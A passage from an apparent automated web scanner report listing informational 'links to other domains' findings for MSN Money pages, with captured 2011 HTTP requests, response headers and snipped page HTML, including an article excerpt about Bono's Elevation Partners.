...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+can+i+budget+to+save&amp;go=&amp;form=money3">How can I budget to save money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+is+the+difference+between+a+credit+union+and+a+bank&amp;form=money3">How is a credit union different from a bank?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Should+an+adult+have+an+allowance&amp;form=money3">Should an adult have an allowance?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.211. http://money.redacted/saving-money/50-30-20-budget.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /saving-money/50-30-20-budget.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /saving-money/50-30-20-budget.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=3fdf5153d87c4b50af336b1575203d66; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:51:09 GMT
Content-Length: 33120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406270&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fsaving-money%2F50-30-20-budget.aspx%3FGT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money - Strategies for saving more" shape="rect" coords="15,1,263,72" /><area href="http://learn.bankofamerica.com/" alt="Sponsored by Bank of America" shape="rect" coords="833,20,977,50" /><area href="http://lifestyle.redacted/your-life/your-money-today/" alt="MSN Lifestyle" shape="rect" coords="805,60,865,80" />
...[SNIP]...
<div class="br br1"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js"></script>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=What+is+the+secret+to+saving+money&amp;form=money3">What is the secret to saving money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+much+annual+pay+should+I+be+saving&amp;form=money3">How much of my pay should I save?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&amp;form=money3">I want to retire at 50. How much do I need?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+can+i+budget+to+save&amp;go=&amp;form=money3">How can I budget to save money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+is+the+difference+between+a+credit+union+and+a+bank&amp;form=money3">How is a credit union different from a bank?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Should+an+adult+have+an+allowance&amp;form=money3">Should an adult have an allowance?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.212. http://money.redacted/top-stocks/post.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /top-stocks/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:28 GMT
Content-Length: 69148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353548&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Ftop-stocks%2Fpost.aspx%3Fpost%3D2150c69c-d2a4-4ab3-821b-4697128c6c1e&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0763-0000-0000-000000000000_20110128204040_Bono_012811_AP_164.jpg" alt="Credit: (&#169; Virginia Mayo/AP)&#xA;Caption: Bono" class="imagefloatleft userImage lead" />Bono hasn't had the best go as a technology investor. His private-equity firm, Elevation Partners, lost some geek cred after plowing $460 million into failed device maker Palm.<br />
...[SNIP]...
<br />Such is the rocky life of a big-risk, big-reward private equity firm. But the U2 frontman's company may face its toughest hurdle yet, now that a co-founder has decided to leave. <a href="http://finance.fortune.cnn.com/2011/01/26/exclusive-elevations-bodnick-is-headed-to-quora/?section=magazines_fortune" title="http://finance.fortune.cnn.com/2011/01/26/exclusive-elevations-bodnick-is-headed-to-quora/?section=magazines_fortune">Fortune reports</a> that Marc Bodnick is resigning as co-founding partner at Elevation for a position at Quora, an online question-and-answer site <a href="http://techcrunch.com/2010/03/28/quora-has-the-magic-benchmark-invests-at-86-million-valuation/" title="http://techcrunch.com/2010/03/28/quora-has-the-magic-benchmark-invests-at-86-million-valuation/">valued last year</a>
...[SNIP]...
<br />His departure is damaging enough for Elevation. But <a href="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1" title="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1">today brings word</a>
...[SNIP]...
<!--EndofExcerptMarker--> The feud was simmering in private, <a href="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1" title="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1">The Daily Beast reports</a>
...[SNIP]...
<br />In 2007, all three partners made personal investments in Facebook by buying large chunks of stock from employees, <a href="http://www.mercurynews.com/business/ci_17039439?nclick_check=1" title="http://www.mercurynews.com/business/ci_17039439?nclick_check=1">The San Jose Mercury-News reports</a>
...[SNIP]...
rlBinary', 'True','1');" href="http://money.msn.com/top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ry', 'True','0');" href="http://money.msn.com/top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.247wallst.com/" class="opennew">24/7 Wall Street</a>
...[SNIP]...
<li><a href="http://confusedcapitalist.blogspot.com/" class="opennew">The Confused Capitalist</a>
...[SNIP]...
<li><a href="http://dealbook.blogs.nytimes.com/">DealBook</a></li><li><a href="http://www.dealbreaker.com/" class="opennew">DealBreaker.com</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/business/" class="opennew">Huffington Post Business</a>
...[SNIP]...
<li><a href="http://www.rgemonitor.com/blog/roubini" class="opennew">Nouriel Roubini's blog</a>
...[SNIP]...
<li><a href="http://seekingalpha.com/" class="opennew">Seeking Alpha</a>
...[SNIP]...
<li><a href="http://bigpicture.typepad.com/" class="opennew">The Big Picture</a>
...[SNIP]...
<li><a href="http://norris.blogs.nytimes.com/?ref=business" class="opennew">Floyd Norris: Notions on High and Low Finance</a>
...[SNIP]...
<li><a href="http://www.dailyspeculations.com/wordpress/" class="opennew">Daily Speculations</a>
...[SNIP]...
<li><a href="http://www.tickersense.typepad.com/" class="opennew">Ticker Sense</a>
...[SNIP]...
<li><a href="http://freakonomics.blogs.nytimes.com/" class="opennew">Freakonomics</a>
...[SNIP]...
<li><a href="http://www.prospect.org/csnc/blogs/beat_the_press" class="opennew">Beat the Press</a>
...[SNIP]...
<li><a href="http://www.kudlowsmoneypolitics.blogspot.com/" class="opennew">Kudlow's Money Politic$</a>
...[SNIP]...
<li><a href="http://www.moneytalksnews.com/" class="opennew">Money Talks News</a>
...[SNIP]...
<li><a href="http://delong.typepad.com/sdj/index_heavy.html" class="opennew">Brad DeLong's Semi-Daily Journal</a>
...[SNIP]...
<li><a href="http://www.digstock.com/blogdigg.php" class="opennew">DigStock Dig Blog</a>
...[SNIP]...
<li><a href="http://www.alleyinsider.com/" class="opennew">Silicon Alley Insider</a>
...[SNIP]...
<li><a href="http://www.thedisciplinedinvestor.com/" class="opennew">The Disciplined Investor</a>
...[SNIP]...
<li><a href="http://www.howardlindzon.com/" class="opennew">Howard Lindzon</a>
...[SNIP]...
<li class="last"><a href="http://www.portfolio.com/views/blogs/market-movers/2008/09/20/hank-paulson-buy-sider" class="opennew">Market Movers</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&amp;form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.213. http://money.redacted/top-stocks/post.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /top-stocks/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 18:01:17 GMT
Content-Length: 69147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410477&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Ftop-stocks%2Fpost.aspx%3Fpost%3D2150c69c-d2a4-4ab3-821b-4697128c6c1e&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0763-0000-0000-000000000000_20110128204040_Bono_012811_AP_164.jpg" alt="Credit: (&#169; Virginia Mayo/AP)&#xA;Caption: Bono" class="imagefloatleft userImage lead" />Bono hasn't had the best go as a technology investor. His private-equity firm, Elevation Partners, lost some geek cred after plowing $460 million into failed device maker Palm.<br />
...[SNIP]...
<br />Such is the rocky life of a big-risk, big-reward private equity firm. But the U2 frontman's company may face its toughest hurdle yet, now that a co-founder has decided to leave. <a href="http://finance.fortune.cnn.com/2011/01/26/exclusive-elevations-bodnick-is-headed-to-quora/?section=magazines_fortune" title="http://finance.fortune.cnn.com/2011/01/26/exclusive-elevations-bodnick-is-headed-to-quora/?section=magazines_fortune">Fortune reports</a> that Marc Bodnick is resigning as co-founding partner at Elevation for a position at Quora, an online question-and-answer site <a href="http://techcrunch.com/2010/03/28/quora-has-the-magic-benchmark-invests-at-86-million-valuation/" title="http://techcrunch.com/2010/03/28/quora-has-the-magic-benchmark-invests-at-86-million-valuation/">valued last year</a>
...[SNIP]...
<br />His departure is damaging enough for Elevation. But <a href="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1" title="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1">today brings word</a>
...[SNIP]...
<!--EndofExcerptMarker--> The feud was simmering in private, <a href="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1" title="http://www.businessinsider.com/a-nasty-battle-over-money-is-breaking-up-bonos-silicon-valley-private-equity-firm-elevation-partners-2011-1">The Daily Beast reports</a>
...[SNIP]...
<br />In 2007, all three partners made personal investments in Facebook by buying large chunks of stock from employees, <a href="http://www.mercurynews.com/business/ci_17039439?nclick_check=1" title="http://www.mercurynews.com/business/ci_17039439?nclick_check=1">The San Jose Mercury-News reports</a>
...[SNIP]...
rlBinary', 'True','1');" href="http://money.msn.com/top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ry', 'True','0');" href="http://money.msn.com/top-stocks/post.aspx?post=2150c69c-d2a4-4ab3-821b-4697128c6c1e&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.247wallst.com/" class="opennew">24/7 Wall Street</a>
...[SNIP]...
<li><a href="http://confusedcapitalist.blogspot.com/" class="opennew">The Confused Capitalist</a>
...[SNIP]...
<li><a href="http://dealbook.blogs.nytimes.com/">DealBook</a></li><li><a href="http://www.dealbreaker.com/" class="opennew">DealBreaker.com</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/business/" class="opennew">Huffington Post Business</a>
...[SNIP]...
<li><a href="http://www.rgemonitor.com/blog/roubini" class="opennew">Nouriel Roubini's blog</a>
...[SNIP]...
<li><a href="http://seekingalpha.com/" class="opennew">Seeking Alpha</a>
...[SNIP]...
<li><a href="http://bigpicture.typepad.com/" class="opennew">The Big Picture</a>
...[SNIP]...
<li><a href="http://norris.blogs.nytimes.com/?ref=business" class="opennew">Floyd Norris: Notions on High and Low Finance</a>
...[SNIP]...
<li><a href="http://www.dailyspeculations.com/wordpress/" class="opennew">Daily Speculations</a>
...[SNIP]...
<li><a href="http://www.tickersense.typepad.com/" class="opennew">Ticker Sense</a>
...[SNIP]...
<li><a href="http://freakonomics.blogs.nytimes.com/" class="opennew">Freakonomics</a>
...[SNIP]...
<li><a href="http://www.prospect.org/csnc/blogs/beat_the_press" class="opennew">Beat the Press</a>
...[SNIP]...
<li><a href="http://www.kudlowsmoneypolitics.blogspot.com/" class="opennew">Kudlow's Money Politic$</a>
...[SNIP]...
<li><a href="http://www.moneytalksnews.com/" class="opennew">Money Talks News</a>
...[SNIP]...
<li><a href="http://delong.typepad.com/sdj/index_heavy.html" class="opennew">Brad DeLong's Semi-Daily Journal</a>
...[SNIP]...
<li><a href="http://www.digstock.com/blogdigg.php" class="opennew">DigStock Dig Blog</a>
...[SNIP]...
<li><a href="http://www.alleyinsider.com/" class="opennew">Silicon Alley Insider</a>
...[SNIP]...
<li><a href="http://www.thedisciplinedinvestor.com/" class="opennew">The Disciplined Investor</a>
...[SNIP]...
<li><a href="http://www.howardlindzon.com/" class="opennew">Howard Lindzon</a>
...[SNIP]...
<li class="last"><a href="http://www.portfolio.com/views/blogs/market-movers/2008/09/20/hank-paulson-buy-sider" class="opennew">Market Movers</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&amp;form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.214. http://redacted/investor/StockRating/srstopstocksresults.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srstopstocksresults.aspx

Issue detail

